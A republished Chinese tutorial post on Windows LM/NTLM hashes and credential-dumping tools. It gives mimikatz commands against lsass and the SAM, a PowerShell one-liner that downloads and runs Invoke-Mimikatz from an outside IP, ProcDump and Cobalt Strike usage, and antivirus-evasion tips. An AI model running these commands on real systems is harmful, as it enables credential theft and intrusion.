windows hash简介

一、hash简介

1、Windows系统使用两种方法对用户的密码进行哈希处理。它们分别是LAN Manager(LM)哈希和

NT LAN Manager(NTLM)哈希

2、所谓哈希(hash),就是使用一种加密函数进行计算后的结果。这个加密函数对一个任意长度的

字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串

3、现在已经有了更新的NTLMV2以及Kerberos验证体系

4、Windows加密过的密码口令;我们称之为hash,windows的系统密码hash默认情况下一般由两部

分组成:第一部分是LM-hash,第二部是NTLM-hash(以:分隔)

默认使用的是NTLM的哈希值(知道LM的哈希就行)

格式:

5、windows认证基础

windows的认证包括三个部分:(此处自己去了解)

①本地认证:用户直接操作计算机登录账号(平时登录)

1、用户输入密码

2、系统收到密码后将用户输入的密码计算成NTLM Hash

3、与sam数据库(安全账户管理器)(%SystemRoot%\system32\config\sam)中该用户的哈希比对

sam直接打是打不开的,需要安全模式或者其他方式,后续补充

4、匹配则登录成功,不匹配则登陆失败

5、NTLM哈希,是一种单向哈希算法,windows将用户的密码计算成NTLM哈希之后才存储在电脑。

6、本地认证中用来处理用户输入密码进程为lsass.exe,密码会在这个进程中明文保存,供该进程

将密码计算成NTLM Hash与sam进行比对,我们使用mimikatz来获取的明文密码,便是在这个进

程中读取到的

简单的ntlm哈希可以进行解密

网址:md5在线解密破解,md5解密加密 (cmd5.com)

②网络认证:远程连接到工作组中的某个设备(远程ftp,文件共享)

③域认证:登录到域环境中的某个设备

二、系统用户密码凭证获取

1、凭证获取工具

①mimikatz(此处是2.0)

读取系统的密码和解密特定的加密的密码 

win10下载地址:Releases · gentilkiwi/mimikatz (github.com)(可以不下载源码,下第二个)

一般都是非交互式,除非你拿到这个shell,传了此软件后,再交互执行

本地非交互式凭证获取:

直接以管理员权限运行mimikatz(交互式)

交互式测试可以按照①依次执行查看效果(拿到NLTM hash去尝试进行解密(不一定可解))

后期可以利用hash值横向渗透

privilege::debug    token::list

①mimikatz.exe "log rs.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"

获取明文密码:

②mimikatz.exe "log logon.txt" "privilege::debug" "sekurlsa::logonpasswords"  "exit"

后面执行结果写入rs.txt   进行提权(调试模式:需要管理员权限)  sam数据库中获取hash值

1.0版本命令:

privilege:debug   //提升权限

inject:process lsass.exe sekurlsa.dll    //注入sekurlsa.dll 到lsass.exe 进程里

@getLogonPasswords     //获取密码

②powershell脚本

远程加载m脚本(获取系统当中明文密码)此方法不推荐使用

powershell lEX (New-Object Net.WebClient).DownloadString(http://47.101.214.85:8000/Invoke-MimikatZ.ps1');Invoke-Mimikatz -DumpCreds

别名 创建对象为Net.webClient   方法  (脚本存放位置:此处为vps服务器上) ;分隔 调用命令执行(请求vps脚本去加载)

python3 -m http.server 8080(用于测试和开发,在服务器的指定端口开启一个服务)

不知道命令作用含义可以 get-help  参数+百度翻译

powershell的基本使用(自己去了解)比cmd强大一点

脚本要会看
powershell lEX(new-object net.webclient)downloadstring(http://47.101.214.85:8000/Get-PassHashes.ps1');Get-PassHashes

列出了当前NTLM的哈希和lm的哈希

③wce

下载地址:Releases · returnvar/wce (github.com)Amplia Security - Research - Windows Credentials Editor (WCE)

方法2:kali中文件下载到windows机器中

kali中自带有/usr/share/windows-resources/wce,可以在kali中开个http服务,供下载

到需要开启下载的目录 ,这里以wce为示例:

cd   /usr/share/windows-resources/wce

python3   -m  http.server 11111(在11111号端口开启http服务)

此时可以在windows中访问 192.168.129.132:11111//usr/share/windows-resources/wce

此时就可以进行下载

ctrl+c退出服务(不放心可以netstat -anltup | grep 11111)

软件运行不了(后期再看)下载地址:Releases · returnvar/wce (github.com)

④pwddump7

下载地址:https://download.openwall.net/pub/projects/john/contrib/pwdump/pwdump7.zip

也运行不了

⑤ophcrack

下载地址:OphCrack 下载 |SourceForge.net

网站破解不了哈希值的话,配合彩虹表破解

彩虹表:

https://ophcrack.sourceforge.io/tables.phphttp://project-rainbowcrack.com/table.htm

⑥procdump+mimikatz

下载地址:ProcDump - Sysinternals | Microsoft Learn

微软的(有签名)可以绕过杀软

procdump lass进程导出

mimikatz执行需要免杀

⑦注册表导出hash

⑧lazagne

LaZagne.exe   all

⑨meterpreter获取哈希(功能多,掉了不好搞) 

hashdmp

需要管理员权限get  system提权 之后直接执行hashdump里边也集成了mimikatz模块

⑩cobaltsritle获取哈希(cs方便一点)

得到shell会话后(不建议调为0容易被发现查杀)

b里边执行就行

例如在cs中通过upload上传wce到目标机器上(指定目录)

shell PwDump7.exe>1.txt

一、hash简介

二、系统用户密码凭证获取


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/22200.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

电厂三维人员定位系统的应用与优势有哪些?

在电力行业的快速发展中,电厂的安全生产和管理显得尤为重要。近年来,随着信息技术的不断进步,电厂三维人员定位系统逐渐成为电厂安全管理的新利器。该系统利用三维技术,实现对电厂内部人员位置的实时监控与定位,大大提…

主机加固的最后一米防护

智慧互联的浪潮正席卷全球,它不仅重塑了传统的工业格局,也催生了无数创新的商业模式。随着物联网和互联网技术的飞速发展,智能化、自动化、联网化已成为未来各个行业的发展方向。然而,智慧物联的开放性、系统的漏洞以及基于用户、…

初识JAVA中的包装类,时间复杂度及空间复杂度

目录: 一.包装类 二.时间复杂度 三.空间复杂度 一.包装类: 在Java中,由于基本类型不是继承自Object,为了在泛型代码中可以支持基本类型,Java 给每个基本类型都对应了一个包装类型。 1 基本数据类型和对应的包装类 &am…

【Lua】IntelliJ IDEA 写注释或选中变量单词时偶尔会选中相邻的内容或下一行内容

例如: --UI代码local a 0 当你想在a变量上方加一行 --UI代码注释时,会发现敲打daima中文拼音时(还未按回车)就会选中当前行以及下一行前半部分。 打完按空格就会变成这样子! 原因是因为开启了英文检测,需要关掉它。 …

基于SVm和随机森林算法模型的中国黄金价格预测分析与研究

摘要 本研究基于回归模型,运用支持向量机(SVM)、决策树和随机森林算法,对中国黄金价格进行预测分析。通过历史黄金价格数据的分析和特征工程,建立了相应的预测模型,并利用SVM、决策树和随机森林算法进行训…

Gradio 案例——将文本文件转为词云图

文章目录 Gradio 案例——将文本文件转为词云图界面截图依赖安装项目目录结构代码 Gradio 案例——将文本文件转为词云图 利用 word_cloud 库,将文本文件转为词云图更完整、丰富的示例项目见 GitHub - AlionSSS/wordcloud-webui: The web UI for word_cloud(text t…

Python脚手架系列-PyQt5

记录PyQt模块使用中的一些常常复用的代码 其他 导入界面 import sysfrom PyQt5.QtGui import QIcon from PyQt5.QtWidgets import QApplication, QMainWindow from UI.MainWindow import Ui_MainWindow # 导入UI界面的类以供继承class MyApp(QMainWindow, Ui_MainWindow):de…

未来以来!鸿蒙生态爆发式增长,程序员新出路火速Get。

鸿蒙生态取得爆发式增长! 鸿蒙生态建设速度突飞猛进,不仅有超4000款应用加速开发,众多头部SDK伙伴也在积极加入,为开发者提供构建鸿蒙原生应用所需的多项能力。近期,友盟移动统计SDK、神策数据SDK、阿里云日志服务SDK…

Latex中标注通讯作者

** 直接使用脚注,不用添加宏包 多个同地址的并列,建议加点空格,好看一些 ** \title{xxxxxxxxxxxxxxxxxxx}\author{xxxxxxxxxxxxxxxxxxx\footnote{Corresponding author} ,bbbbbbbbbbbbbbbbbbb}\address{xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx…

免费,Scratch蓝桥杯比赛历年真题--第15届蓝桥杯STEMA真题-2024年3月份(含答案解析和代码)

第15届蓝桥杯STEMA真题-2024年3月份 一、单选题 答案&#xff1a;D 解析&#xff1a;y坐标正值表示上&#xff0c;负值表示下&#xff0c;故答案为D。 答案&#xff1a;C 解析&#xff1a;18<25为真&#xff0c;或关系表示一真即为真&#xff0c;故答案为C。 答案&#xff…

Android设备获取OAID调研和实现

什么是OAID、AAID、VAID OAID OAID是"Android ID"&#xff08;安卓ID&#xff09;的一种替代方案&#xff0c;其全称为"Open Anonymous Identifier"&#xff08;开放匿名标识符&#xff09;。 因传统的移动终端设备标识如国际移动设备识别码&#xff08;…

冯喜运:6.5黄金原油今日行情趋势分析及操作策略

【黄金消息面分析】&#xff1a;在全球经济的波动中&#xff0c;美元和黄金市场的表现一直是投资者关注的焦点。最近&#xff0c;市场情绪和经济数据的波动对这两个市场产生了显著的影响。周二欧市早盘&#xff0c;现货黄金价格出现短线回调&#xff0c;金价跌破2340美元/盎司&…

数组中的第K个最大元素 ---- 分治-快排

题目链接 题目: 分析: 这道题很明显是一个top-K问题, 我们很容易想到用堆排序来解决, 堆排序的时间复杂度是O(N*logN), 不符合题意, 所以我们可以用另一种方法:快速选择算法, 他的时间复杂度为O(N)快速选择算法, 其实是基于快排, 进行修改而成, 我们还是使用将"将数组分…

【Godot4自学手册】第四十一节背包系统(一)UI设置

各位同学&#xff0c;好久没有更新笔记了&#xff0c;今天开始&#xff0c;我准备自学背包系统。今天先学习下UI界面设置。 一、新建场景和结点 1.新建Node2D场景&#xff0c;命名为Inventory&#xff0c;保存到Scenes目录下&#xff0c;inventory.tscn。 2.新建TextureRect子…

kivy.garden.matplotlib

matplotlib 是什么 # pip install matplotlib2.2.2 from kivy.garden.matplotlib.backend_kivyagg import FigureCanvasKivyAgg FigureCanvasKivyAgg class FigureCanvasKivyAgg(FigureCanvasKivy, FigureCanvasAgg):FigureCanvasKivyAgg class. See module documentation f…

国联易安:网络反不正当竞争,要防患于未然

据市场监管总局官网消息&#xff0c;为预防和制止网络不正当竞争&#xff0c;维护公平竞争的市场秩序&#xff0c;鼓励创新&#xff0c;保护经营者和消费者的合法权益&#xff0c;促进数字经济规范健康持续发展&#xff0c;市场监管总局近日发布《网络反不正当竞争暂行规定》&a…

微信小程序-WXS脚本

一、概述 1.WXS WXS(WeiXin Script)是小程序独有的一套脚本语言&#xff0c;结合 WXML&#xff0c;可以构建出页面的结构。 2.wxs 的应用场景 wxml中无法调用在页面的.js 中定义的函数&#xff0c;但是&#xff0c;wxml 中可以调用 wxs 中定义的函数。因此&#xff0c;小程序…

软件测试总结基础

软件测试总结基础 1. 何为软件测试 定义&#xff1a;使用技术手段验证软件是否满足需求 目的&#xff1a;减少bug&#xff0c;保证质量 2. 软件测试分类 阶段划分 单元测试&#xff0c;针对源代码进行测试集成测试&#xff0c;针对接口进行测试系统测试&#xff0c;针对功能…

Web 网页性能优化

Web 网页性能及性能优化 一、Web 性能 Web 性能是 Web 开发的一个重要方面&#xff0c;侧重于网页加载速度以及对用户输入的响应速度 通过优化网站来改善性能&#xff0c;可以在为用户提供更好的体验 网页性能既广泛又非常深入 1. 为什么性能这么重要&#xff1f; 1. 性能…

人工智能学习笔记(1):了解sklearn

sklearn 简介 Sklearn是一个基于Python语言的开源机器学习库。全称Scikit-Learn&#xff0c;是建立在诸如NumPy、SciPy和matplotlib等其他Python库之上&#xff0c;为用户提供了一系列高质量的机器学习算法&#xff0c;其典型特点有&#xff1a; 简单有效的工具进行预测数据分…